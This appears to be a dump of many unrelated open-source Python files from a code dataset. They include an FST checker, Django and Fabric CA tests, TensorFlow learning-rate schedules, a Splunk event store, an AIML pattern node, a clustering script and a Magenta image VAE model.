ilab = []
for arc in state:
ilab.append(arc.ilabel)
ilabs = set(ilab)
if 0 in ilabs and len(ilab) != 1:
sys.stderr.write(
"Node {} has a non-epsilon arc that is not unique: {}"
.format(state, ilab))
exit(1)
if len(ilabs) != len(ilab):
sys.stderr.write(
"Node {} has duplicated ilabels on edges: {}"
.format(state, ilab))
exit(1)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Check that all outgoing edges have either:\n"
"1. Non-esilon and different ilabels or\n"
"2. A single apsilon-labeled ilabel.")
parser.add_argument("fst_file", default='-', nargs='?')
args = parser.parse_args()
main(args)
|
tests/test_cache.py | wieczorek1990/django-dynamic-models | 122 | 12738935 | import pytest
from django.utils import timezone
from dynamic_models import cache
TEST_MODEL_NAME = "test"
now = timezone.now()
@pytest.fixture
def mock_now(monkeypatch):
monkeypatch.setattr(timezone, "now", lambda: now)
def test_get_and_update_last_modified(mock_now):
assert cache.get_last_modified(TEST_MODEL_NAME) is None
cache.update_last_modified(TEST_MODEL_NAME)
assert cache.get_last_modified(TEST_MODEL_NAME) == now
def test_delete_last_modified(mock_now):
cache.update_last_modified(TEST_MODEL_NAME)
assert cache.get_last_modified(TEST_MODEL_NAME) == now
cache.clear_last_modified(TEST_MODEL_NAME)
assert cache.get_last_modified(TEST_MODEL_NAME) is None
|
sdk/python/kfp/dsl/type_utils.py | Iuiu1234/pipelines | 2,860 | 12738941 | <reponame>Iuiu1234/pipelines
# Copyright 2021 The Kubeflow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Deprecated. See kfp.v2.components.types.type_utils instead.
This module will be removed in KFP v2.0.
"""
import warnings
from kfp.v2.components.types import type_utils
warnings.warn(
'Module kfp.dsl.type_utils is deprecated and will be removed'
' in KFP v2.0. Please use from kfp.v2.components.types.type_utils instead.',
category=FutureWarning)
is_parameter_type = type_utils.is_parameter_type
get_artifact_type_schema = type_utils.get_artifact_type_schema
get_parameter_type = type_utils.get_parameter_type
get_input_artifact_type_schema = type_utils.get_input_artifact_type_schema
|
research/object_detection/utils/learning_schedules.py | kopankom/models | 153 | 12738955 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Library of common learning rate schedules."""
import numpy as np
import tensorflow as tf
def exponential_decay_with_burnin(global_step,
learning_rate_base,
learning_rate_decay_steps,
learning_rate_decay_factor,
burnin_learning_rate=0.0,
burnin_steps=0):
"""Exponential decay schedule with burn-in period.
In this schedule, learning rate is fixed at burnin_learning_rate
for a fixed period, before transitioning to a regular exponential
decay schedule.
Args:
global_step: int tensor representing global step.
learning_rate_base: base learning rate.
learning_rate_decay_steps: steps to take between decaying the learning rate.
Note that this includes the number of burn-in steps.
learning_rate_decay_factor: multiplicative factor by which to decay
learning rate.
burnin_learning_rate: initial learning rate during burn-in period. If
0.0 (which is the default), then the burn-in learning rate is simply
set to learning_rate_base.
burnin_steps: number of steps to use burnin learning rate.
Returns:
a (scalar) float tensor representing learning rate
"""
if burnin_learning_rate == 0:
burnin_learning_rate = learning_rate_base
post_burnin_learning_rate = tf.train.exponential_decay(
learning_rate_base,
global_step,
learning_rate_decay_steps,
learning_rate_decay_factor,
staircase=True)
return tf.where(
tf.less(tf.cast(global_step, tf.int32), tf.constant(burnin_steps)),
tf.constant(burnin_learning_rate),
post_burnin_learning_rate)
def cosine_decay_with_warmup(global_step,
learning_rate_base,
total_steps,
warmup_learning_rate=0.0,
warmup_steps=0):
"""Cosine decay schedule with warm up period.
Cosine annealing learning rate as described in:
Loshchilov and Hutter, SGDR: Stochastic Gradient Descent with Warm Restarts.
ICLR 2017. https://arxiv.org/abs/1608.03983
In this schedule, the learning rate grows linearly from warmup_learning_rate
to learning_rate_base for warmup_steps, then transitions to a cosine decay
schedule.
Args:
global_step: int64 (scalar) tensor representing global step.
learning_rate_base: base learning rate.
total_steps: total number of training steps.
warmup_learning_rate: initial learning rate for warm up.
warmup_steps: number of warmup steps.
Returns:
a (scalar) float tensor representing learning rate.
Raises:
ValueError: if warmup_learning_rate is larger than learning_rate_base,
or if warmup_steps is larger than total_steps.
"""
if learning_rate_base < warmup_learning_rate:
raise ValueError('learning_rate_base must be larger '
'or equal to warmup_learning_rate.')
if total_steps < warmup_steps:
raise ValueError('total_steps must be larger or equal to '
'warmup_steps.')
learning_rate = 0.5 * learning_rate_base * (
1 + tf.cos(np.pi * (tf.cast(global_step, tf.float32) - warmup_steps
) / float(total_steps - warmup_steps)))
if warmup_steps > 0:
slope = (learning_rate_base - warmup_learning_rate) / warmup_steps
pre_cosine_learning_rate = slope * tf.cast(
global_step, tf.float32) + warmup_learning_rate
learning_rate = tf.where(
tf.less(tf.cast(global_step, tf.int32), warmup_steps),
pre_cosine_learning_rate,
learning_rate)
return learning_rate
def manual_stepping(global_step, boundaries, rates):
"""Manually stepped learning rate schedule.
This function provides fine grained control over learning rates. One must
specify a sequence of learning rates as well as a set of integer steps
at which the current learning rate must transition to the next. For example,
if boundaries = [5, 10] and rates = [.1, .01, .001], then the learning
rate returned by this function is .1 for global_step=0,...,4, .01 for
global_step=5...9, and .001 for global_step=10 and onward.
Args:
global_step: int64 (scalar) tensor representing global step.
boundaries: a list of global steps at which to switch learning
rates. This list is assumed to consist of increasing positive integers.
rates: a list of (float) learning rates corresponding to intervals between
the boundaries. The length of this list must be exactly
len(boundaries) + 1.
Returns:
a (scalar) float tensor representing learning rate
Raises:
ValueError: if one of the following checks fails:
1. boundaries is a strictly increasing list of positive integers
2. len(rates) == len(boundaries) + 1
"""
if any([b < 0 for b in boundaries]) or any(
[not isinstance(b, int) for b in boundaries]):
raise ValueError('boundaries must be a list of positive integers')
if any([bnext <= b for bnext, b in zip(boundaries[1:], boundaries[:-1])]):
raise ValueError('Entries in boundaries must be strictly increasing.')
if any([not isinstance(r, float) for r in rates]):
raise ValueError('Learning rates must be floats')
if len(rates) != len(boundaries) + 1:
raise ValueError('Number of provided learning rates must exceed '
'number of boundary points by exactly 1.')
if not boundaries: return tf.constant(rates[0])
step_boundaries = tf.constant(boundaries, tf.int32)
num_boundaries = len(boundaries)
learning_rates = tf.constant(rates, tf.float32)
index = tf.reduce_min(
tf.where(
# Casting global step to tf.int32 is dangerous, but necessary to be
# compatible with TPU.
tf.greater(step_boundaries, tf.cast(global_step, tf.int32)),
tf.constant(range(num_boundaries), dtype=tf.int32),
tf.constant([num_boundaries] * num_boundaries, dtype=tf.int32)))
return tf.reduce_sum(learning_rates * tf.one_hot(index, len(rates),
dtype=tf.float32))
|
test/integration/identity_service_test.py | hyperledger-gerrit-archive/fabric-sdk-py | 389 | 12738971 | # Copyright IBM Corp. 2016 All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import time
import unittest
import random
import string
from hfc.fabric_ca.caservice import CAService
from test.integration.utils import cli_call
with open(os.path.join(os.path.dirname(__file__),
"../fixtures/ca/enroll-csr.pem")) as f:
test_pem = f.read()
ENROLLMENT_ID = "admin"
ENROLLMENT_SECRET = "adminpw"
def get_random_username():
return ''.join(
[random.choice(string.ascii_letters + string.digits)
for n in range(9)])
class IdentityServiceTest(unittest.TestCase):
"""Test for ca module. """
def setUp(self):
self._enrollment_id = ENROLLMENT_ID
self._enrollment_secret = ENROLLMENT_SECRET
if os.getenv("CA_ADDR"):
self._ca_server_address = os.getenv("CA_ADDR")
else:
self._ca_server_address = "localhost:7054"
self.compose_file_path = os.path.normpath(
os.path.join(os.path.dirname(__file__),
"../fixtures/ca/docker-compose.yml")
)
self.start_test_env()
self._ca_service = CAService("http://" + self._ca_server_address)
id = self._enrollment_id
secret = self._enrollment_secret
self._adminEnrollment = self._ca_service.enroll(id, secret)
self._identityService = self._ca_service.newIdentityService()
def tearDown(self):
self.shutdown_test_env()
def start_test_env(self):
cli_call(["docker-compose", "-f", self.compose_file_path, "up", "-d"])
time.sleep(5)
def shutdown_test_env(self):
cli_call(["docker-compose", "-f", self.compose_file_path, "down"])
def test_create_success(self):
"""Test create success.
"""
username = get_random_username()
secret = self._identityService.create(self._adminEnrollment, username,
enrollmentSecret='pass')
self.assertTrue(secret == 'pass')
def test_getOne_success(self):
"""Test getOne success.
"""
username = get_random_username()
self._identityService.create(self._adminEnrollment, username)
res = self._identityService.getOne(username, self._adminEnrollment)
self.assertTrue(res['result']['id'] == username)
self.assertTrue(res['success'] is True)
def test_getAll_success(self):
"""Test getAll success.
"""
username = get_random_username()
self._identityService.create(self._adminEnrollment, username)
res = self._identityService.getAll(self._adminEnrollment)
self.assertTrue(len(res['result']['identities']) > 0)
self.assertTrue(res['success'] is True)
def test_delete_success(self):
"""Test delete success.
"""
username = get_random_username()
self._identityService.create(self._adminEnrollment, username)
res = self._identityService.delete(username, self._adminEnrollment)
self.assertTrue(res['success'] is True)
def test_update_success(self):
"""Test update success.
"""
username = get_random_username()
self._identityService.create(self._adminEnrollment, username)
res = self._identityService.update(username, self._adminEnrollment,
maxEnrollments=3)
self.assertTrue(res['result']['id'] == username)
self.assertTrue(res['result']['max_enrollments'] == 3)
self.assertTrue(res['success'] is True)
if __name__ == '__main__':
unittest.main()
|
geoq/agents/urls.py | kaydoh/geoq | 471 | 12738985 | # -*- coding: utf-8 -*-
# This technical data was produced for the U. S. Government under Contract No. W15P7T-13-C-F600, and
# is subject to the Rights in Technical Data-Noncommercial Items clause at DFARS 252.227-7013 (FEB 2012)
from django.contrib.auth.decorators import login_required
from django.conf.urls import url
from .views import feedbackcreate, thankyou, FeedbackListView
from .models import Feedback
urlpatterns = [
url(r'^create/?$', feedbackcreate, name='feedback-create'),
url(r'^view?$', FeedbackListView.as_view(template_name='feedback_list.html',
queryset=Feedback.objects.all()), name='feedback-list'),
url(r'^thankyou/?$', thankyou, name='thanks'),
]
|
zentral/core/stores/backends/splunk.py | sierra-hotel/zentral | 634 | 12739000 | <filename>zentral/core/stores/backends/splunk.py
from datetime import datetime
import json
import logging
import random
import time
from urllib.parse import urlencode, urljoin
from django.utils.functional import cached_property
from django.utils.text import slugify
import requests
from zentral.core.stores.backends.base import BaseEventStore
logger = logging.getLogger('zentral.core.stores.backends.splunk')
class EventStore(BaseEventStore):
max_batch_size = 100
max_retries = 3
def __init__(self, config_d):
super().__init__(config_d)
self.collector_url = urljoin(config_d["hec_url"], "/services/collector/event")
self.hec_token = config_d["hec_token"]
self.search_app_url = config_d.get("search_app_url")
# If set, the computer name of the machine snapshots of these sources will be used
# as host field value. First source with a non-empty value will be picked.
self.computer_name_as_host_sources = [
slugify(src)
for src in config_d.get("computer_name_as_host_sources", [])
]
self.serial_number_field = config_d.get("serial_number_field", "machine_serial_number")
if self.search_app_url:
self.machine_events_url = True
self.probe_events_url = True
self.verify_tls = config_d.get('verify_tls', True)
self.index = config_d.get("index")
self.source = config_d.get("source")
self._collector_session = None
@cached_property
def collector_session(self):
session = requests.Session()
session.verify = self.verify_tls
session.headers.update({'Authorization': f'Splunk {self.hec_token}',
'Content-Type': 'application/json'})
return session
@staticmethod
def _convert_datetime(dt):
if isinstance(dt, str):
dt = dt.replace("+00:00", "").replace("Z", "").strip()
if "." in dt:
fmt = "%Y-%m-%dT%H:%M:%S.%f"
else:
fmt = "%Y-%m-%dT%H:%M:%S"
dt = datetime.strptime(dt, fmt)
ts = time.mktime(dt.timetuple()) + dt.microsecond / 1e6
return "{:.3f}".format(ts)
def _serialize_event(self, event):
if not isinstance(event, dict):
event = event.serialize()
payload_event = event.pop("_zentral")
created_at = payload_event.pop("created_at")
event_type = payload_event.pop("type")
namespace = payload_event.get("namespace", event_type)
payload_event[namespace] = event
# host / serial number
host = "Zentral"
machine_serial_number = payload_event.pop("machine_serial_number", None)
if machine_serial_number:
payload_event[self.serial_number_field] = machine_serial_number
host = machine_serial_number
for ms_src_slug in self.computer_name_as_host_sources:
machine_name = payload_event.get("machine", {}).get(ms_src_slug, {}).get("name")
if machine_name:
host = machine_name
break
else:
observer = payload_event.get("observer", {}).get("hostname")
if observer:
host = observer
payload = {
"host": host,
"sourcetype": event_type,
"time": self._convert_datetime(created_at),
"event": payload_event,
}
if self.index:
payload["index"] = self.index
if self.source:
payload["source"] = self.source
return payload
def store(self, event):
payload = self._serialize_event(event)
for i in range(self.max_retries):
r = self.collector_session.post(self.collector_url, json=payload)
if r.ok:
return
if r.status_code > 500:
logger.error("Temporary server error")
if i + 1 < self.max_retries:
seconds = random.uniform(3, 4) * (i + 1)
logger.error("Retry in %.1fs", seconds)
time.sleep(seconds)
continue
r.raise_for_status()
def bulk_store(self, events):
if self.batch_size < 2:
raise RuntimeError("bulk_store is not available when batch_size < 2")
event_keys = []
data = b""
for event in events:
payload = self._serialize_event(event)
event_keys.append((payload["event"]["id"], payload["event"]["index"]))
if data:
data += b"\n"
data += json.dumps(payload).encode("utf-8")
for i in range(self.max_retries):
r = self.collector_session.post(self.collector_url, data=data)
if r.ok:
return event_keys
if r.status_code > 500:
logger.error("Temporary server error")
if i + 1 < self.max_retries:
seconds = random.uniform(3, 4) * (i + 1)
logger.error("Retry in %.1fs", seconds)
time.sleep(seconds)
continue
r.raise_for_status()
def _get_search_url(self, query, from_dt, to_dt):
kwargs = {
"q": f"search {query}",
"earliest": self._convert_datetime(from_dt),
"latest": self._convert_datetime(to_dt) if to_dt else "now"
}
return "{}?{}".format(self.search_app_url, urlencode(kwargs))
# machine events
def _get_machine_events_query(self, serial_number, event_type=None):
query_chunks = [("host", serial_number)]
if self.index:
query_chunks.append(("index", self.index))
if event_type:
query_chunks.append(("sourcetype", event_type))
return " ".join('{}="{}"'.format(k, v.replace('"', '\\"')) for k, v in query_chunks)
def get_machine_events_url(self, serial_number, from_dt, to_dt=None, event_type=None):
return self._get_search_url(
self._get_machine_events_query(serial_number, event_type),
from_dt, to_dt
)
# probe events
def _get_probe_events_query(self, probe, event_type=None):
filter_chunks = []
if self.index:
filter_chunks.append(("index", self.index))
if event_type:
filter_chunks.append(("sourcetype", event_type))
filter_str = " ".join('{}="{}"'.format(k, v.replace('"', '\\"')) for k, v in filter_chunks)
return f'{filter_str} | spath "probes{{}}.pk" | search "probes{{}}.pk"={probe.pk}'
def get_probe_events_url(self, probe, from_dt, to_dt=None, event_type=None):
return self._get_search_url(
self._get_probe_events_query(probe, event_type),
from_dt, to_dt
)
|
trimesh/voxel/__init__.py | hawkaa/trimesh | 1,882 | 12739013 | <filename>trimesh/voxel/__init__.py
from .base import VoxelGrid
__all__ = [
'VoxelGrid',
]
|
dialogue-engine/src/programy/parser/pattern/nodes/iset.py | cotobadesign/cotoba-agent-oss | 104 | 12739041 | <gh_stars>100-1000
"""
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
"""
Copyright (c) 2016-2019 <NAME> http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from programy.utils.logging.ylogger import YLogger
from programy.parser.pattern.nodes.base import PatternNode
from programy.parser.pattern.matcher import EqualsMatch
from programy.parser.exceptions import ParserException
from programy.utils.language.japanese import JapaneseLanguage
import re
class PatternISetNode(PatternNode):
iset_count = 1
def __init__(self, attribs, text, userid='*', element=None, brain=None):
PatternNode.__init__(self, userid)
self._words = {}
self._values = {}
if 'words' in attribs:
words = attribs['words']
elif text:
words = text
else:
raise ParserException("No words specified as attribute or text", xml_element=element, nodename='iset')
check_words = JapaneseLanguage.zenhan_normalize(words)
self._is_CJK = JapaneseLanguage.is_CJKword(check_words)
if self._parse_words(words) is False:
raise ParserException("empty element in words", xml_element=element, nodename='iset')
self._iset_name = "iset_%d" % (PatternISetNode.iset_count)
PatternISetNode.iset_count += 1
def _parse_words(self, words):
is_success = True
splits = words.split(",")
for word in splits:
word = word.strip()
if word == '':
is_success = False
else:
self.add_set_values(word)
return is_success
def add_set_values(self, value):
checkwords = JapaneseLanguage.zenhan_normalize(value)
checkwords = checkwords.upper()
if self._is_CJK is True:
checkwords = checkwords.replace(' ', '')
else:
checkwords = re.sub(' +', ' ', checkwords)
if checkwords in self._values:
return
self._values[checkwords] = value
if self._is_CJK is True:
splits = checkwords
key = splits[0].upper()
else:
splits = checkwords.split()
key = splits[0].upper()
if key not in self._words:
self._words[key] = []
self._words[key].append(splits)
@property
def words(self):
return self._words
@property
def iset_name(self):
return self._iset_name
def is_iset(self):
return True
def to_xml(self, client_context, include_user=False):
string = ""
if include_user is True:
string += '<iset userid="%s" words="' % self.userid
else:
string += '<iset words="'
if self._is_CJK is False:
string += ", ".join(self._words)
else:
join_char = ""
for key in self.words:
for value in self.words[key]:
string += '%s%s' % (join_char, value)
join_char = ", "
string += '">'
string += super(PatternISetNode, self).to_xml(client_context)
string += "</iset>\n"
return string
def to_string(self, verbose=True):
if self._is_CJK is False:
words_str = ",".join(self._words)
else:
words_str = ""
join_char = ""
for key in self.words:
for value in self.words[key]:
words_str += '%s%s' % (join_char, value)
join_char = ","
if verbose is True:
return "ISET [%s] [%s] words=[%s]" % (self.userid, self._child_count(verbose), words_str)
return "ISET words=[%s]" % words_str
def equivalent(self, other):
if self.userid != other.userid:
return False
if len(self.words) != len(other.words):
return False
if self._is_CJK is False:
for word in self.words:
if word not in other.words:
return False
else:
for key in self.words:
if key not in other.words:
return False
if len(self.words[key]) != len(other.words[key]):
return False
for value in self.words[key]:
if value not in other.words[key]:
return False
return True
def equals(self, client_context, words, word_no):
if client_context.match_nlu is True:
return EqualsMatch(False, word_no)
if self.userid != '*':
if self.userid != client_context.userid:
return EqualsMatch(False, word_no)
word = words.word(word_no)
if word is not None:
match = self.words_in_set(client_context, words, word_no)
if match.matched is True:
YLogger.debug(client_context, "Found word [%s] in iset", word)
return match
YLogger.debug(client_context, "No word [%s] found in iset", word)
return EqualsMatch(False, word_no)
def words_in_set(self, client_context, words, word_no):
word = words.word(word_no)
check_word = JapaneseLanguage.zenhan_normalize(word)
word = check_word.upper()
if self._is_CJK is True:
keyword = word[0]
else:
keyword = word
if keyword in self._words:
phrases = self._words[keyword]
phrases = sorted(phrases, key=len, reverse=True)
for phrase in phrases:
if self._is_CJK is True:
phrase_words = client_context.brain.tokenizer.texts_to_words(phrase)
phrase = "".join(phrase_words)
phrase_text = phrase
else:
phrase_text = " ".join(phrase)
phrase_word_no = 0
words_word_no = word_no
while phrase_word_no < len(phrase) and words_word_no < words.num_words():
word = words.word(words_word_no)
check_word = JapaneseLanguage.zenhan_normalize(word)
word = check_word.upper()
if self._is_CJK is True:
phrase_word = phrase[phrase_word_no:(phrase_word_no + len(word))]
if phrase_word == word:
if (phrase_word_no + len(word)) == len(phrase):
return EqualsMatch(True, words_word_no, self._values[phrase_text])
else:
break
phrase_word_no += len(word)
else:
phrase_word = phrase[phrase_word_no]
if phrase_word == word:
if phrase_word_no+1 == len(phrase):
return EqualsMatch(True, words_word_no, self._values[phrase_text])
else:
break
phrase_word_no += 1
words_word_no += 1
return EqualsMatch(False, word_no)
|
api/system/constants.py | zhangkuantian/cuelake | 272 | 12739078 | ACCOUNT_SETTING_SLACK_URL_KEY = "slackWebhookUrl"
NOTIFY_ON_SUCCESS_KEY = "notifyOnSuccess"
NOTIFY_ON_FAILURE_KEY = "notifyOnFailure" |
datasets/Part 4 - Clustering/Section 25 - Hierarchical Clustering/hc.py | abnercasallo/machinelearning-az | 234 | 12739090 | <gh_stars>100-1000
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 27 13:15:02 2019
@author: juangabriel
"""
# Clustering Jerárquico
# Importar las librerías
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importar los datos del centro comercial con pandas
dataset = pd.read_csv("Mall_Customers.csv")
X = dataset.iloc[:, [3, 4]].values
# Utilizar el dendrograma para encontrar el número óptimo de clusters
import scipy.cluster.hierarchy as sch
dendrogram = sch.dendrogram(sch.linkage(X, method = "ward"))
plt.title("Dendrograma")
plt.xlabel("Clientes")
plt.ylabel("Distancia Euclídea")
plt.show()
# Ajustar el clustetring jerárquico a nuestro conjunto de datos
from sklearn.cluster import AgglomerativeClustering
hc = AgglomerativeClustering(n_clusters = 5, affinity = "euclidean", linkage = "ward")
y_hc = hc.fit_predict(X)
# Visualización de los clusters
plt.scatter(X[y_hc == 0, 0], X[y_hc == 0, 1], s = 100, c = "red", label = "Cautos")
plt.scatter(X[y_hc == 1, 0], X[y_hc == 1, 1], s = 100, c = "blue", label = "Estandard")
plt.scatter(X[y_hc == 2, 0], X[y_hc == 2, 1], s = 100, c = "green", label = "Objetivo")
plt.scatter(X[y_hc == 3, 0], X[y_hc == 3, 1], s = 100, c = "cyan", label = "Descuidados")
plt.scatter(X[y_hc == 4, 0], X[y_hc == 4, 1], s = 100, c = "magenta", label = "Conservadores")
plt.title("Cluster de clientes")
plt.xlabel("Ingresos anuales (en miles de $)")
plt.ylabel("Puntuación de Gastos (1-100)")
plt.legend()
plt.show() |
toolchain/riscv/MSYS/python/Lib/test/test_urllib_response.py | zhiqiang-hu/bl_iot_sdk | 207 | 12739109 | """Unit tests for code in urllib.response."""
import socket
import tempfile
import urllib.response
import unittest
class TestResponse(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.fp = self.sock.makefile('rb')
self.test_headers = {"Host": "www.python.org",
"Connection": "close"}
def test_with(self):
addbase = urllib.response.addbase(self.fp)
self.assertIsInstance(addbase, tempfile._TemporaryFileWrapper)
def f():
with addbase as spam:
pass
self.assertFalse(self.fp.closed)
f()
self.assertTrue(self.fp.closed)
self.assertRaises(ValueError, f)
def test_addclosehook(self):
closehook_called = False
def closehook():
nonlocal closehook_called
closehook_called = True
closehook = urllib.response.addclosehook(self.fp, closehook)
closehook.close()
self.assertTrue(self.fp.closed)
self.assertTrue(closehook_called)
def test_addinfo(self):
info = urllib.response.addinfo(self.fp, self.test_headers)
self.assertEqual(info.info(), self.test_headers)
def test_addinfourl(self):
url = "http://www.python.org"
code = 200
infourl = urllib.response.addinfourl(self.fp, self.test_headers,
url, code)
self.assertEqual(infourl.info(), self.test_headers)
self.assertEqual(infourl.geturl(), url)
self.assertEqual(infourl.getcode(), code)
def tearDown(self):
self.sock.close()
if __name__ == '__main__':
unittest.main()
|
docs/python/logging/logging_test.py | enricomarchesin/notes | 790 | 12739159 | <gh_stars>100-1000
# Import standard library's logging
import logging
# Create function that converts dollars to cents
def convert_dollars_to_cents(dollars):
# Convert dollars to cents (as an integer)
cents = int(dollars * 100)
logging.debug("debug")
logging.info("info")
logging.warning("warning")
logging.error("error")
logging.critical("critical")
# Return cents
return cents
# Create dollar amount
dollars = 12.40
# Run dollars to cents convert function
convert_dollars_to_cents(dollars) |
magenta/models/svg_vae/image_vae.py | sandutsar/magenta | 16,143 | 12739163 | <reponame>sandutsar/magenta
# Copyright 2022 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines the ImageVAE model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from magenta.models.image_stylization import ops
from tensor2tensor.layers import common_hparams
from tensor2tensor.layers import common_layers
from tensor2tensor.utils import registry
from tensor2tensor.utils import t2t_model
import tensorflow.compat.v1 as tf
from tensorflow.compat.v1 import estimator as tf_estimator
import tensorflow_probability as tfp
tfd = tfp.distributions
def _softplus_inverse(x):
"""Helper which computes the function inverse of `tf.nn.softplus`."""
return tf.log(tf.math.expm1(x))
@registry.register_model
class ImageVAE(t2t_model.T2TModel):
"""Defines the ImageVAE model."""
def bottom(self, features):
# inputs and targets should all be images, no preprocessing needed.
# but we do need to resize them to 64x64.
transformed_features = collections.OrderedDict()
transformed_features['targets'] = features['targets']
transformed_features['inputs'] = features['inputs']
transformed_features['cls'] = features['targets_cls']
if 'bottleneck' in features:
transformed_features['bottleneck'] = features['bottleneck']
return transformed_features
def body(self, features):
train = self._hparams.mode == tf_estimator.ModeKeys.TRAIN
return self.vae_internal(features, self._hparams, train)
def top(self, body_output, features):
# body_output should be a dict with 'outputs', which will be an image.
# no postprocessing needed.
return body_output
def loss(self, logits, features):
# logits should be dict with 'outputs', which is image.
targets = tf.reshape(features['targets'], [-1, 64, 64, 1])
weights = common_layers.weights_all(targets)
loss_num = tf.pow(logits - targets, 2)
return tf.reduce_sum(loss_num * weights), tf.reduce_sum(weights)
def vae_internal(self, features, hparams, train):
# inputs and targets should both be images with dims [batch, 64, 64, 1]
inputs, targets = features['inputs'], features['targets']
inputs = tf.reshape(inputs, [-1, 64, 64, 1])
targets = tf.reshape(targets, [-1, 64, 64, 1])
clss = features['cls']
with tf.variable_scope('vae_internal', reuse=tf.AUTO_REUSE):
# encoder
enc_out = self.visual_encoder(inputs, clss, hparams, train)
enc_out = tf.reshape(enc_out, [-1, 2 * hparams.bottleneck_bits])
# bottleneck
sampled_bottleneck, b_loss = self.bottleneck(enc_out)
losses = {'bottleneck_kl': tf.reduce_mean(b_loss)}
if 'bottleneck' in features:
if common_layers.shape_list(features['bottleneck'])[0] == 0:
# return bottleneck for interpolation
# set losses['training'] = 0 so top() isn't called on it
# potential todo: use losses dict so we have kl_loss here for non stop
# gradient models
return sampled_bottleneck, {'training': 0.0}
else:
# we want to use the given bottleneck
sampled_bottleneck = features['bottleneck']
# finalize bottleneck
unbottleneck = sampled_bottleneck
# decoder.
dec_out = self.visual_decoder(unbottleneck, clss, hparams)
# calculate training loss here lol
rec_loss = -dec_out.log_prob(inputs)
elbo = tf.reduce_mean(-(b_loss + rec_loss))
losses['rec_loss'] = tf.reduce_mean(rec_loss)
losses['training'] = -elbo
if (not hasattr(self, 'summarized_imgs')
and self._hparams.mode != tf_estimator.ModeKeys.PREDICT):
self.summarized_imgs = True
with tf.name_scope(None), tf.name_scope('train' if train else 'test'):
tf.summary.image('rendered_out', dec_out.mean())
tf.summary.image('rendered_og', inputs)
return dec_out.mean(), losses
def bottleneck(self, x):
z_size = self.hparams.bottleneck_bits
x_shape = common_layers.shape_list(x)
with tf.variable_scope('bottleneck', reuse=tf.AUTO_REUSE):
mu = x[..., :self.hparams.bottleneck_bits]
if self.hparams.mode != tf_estimator.ModeKeys.TRAIN:
return mu, 0.0 # No sampling or kl loss on eval.
log_sigma = x[..., self.hparams.bottleneck_bits:]
epsilon = tf.random_normal(x_shape[:-1] + [z_size])
z = mu + tf.exp(log_sigma / 2) * epsilon
kl = 0.5 * tf.reduce_mean(
tf.exp(log_sigma) + tf.square(mu) - 1. - log_sigma, axis=-1)
# This is the 'free bits' trick mentioned in Kingma et al. (2016)
free_bits = self.hparams.free_bits
kl_loss = tf.reduce_mean(tf.maximum(kl - free_bits, 0.0))
return z, kl_loss * self.hparams.kl_beta
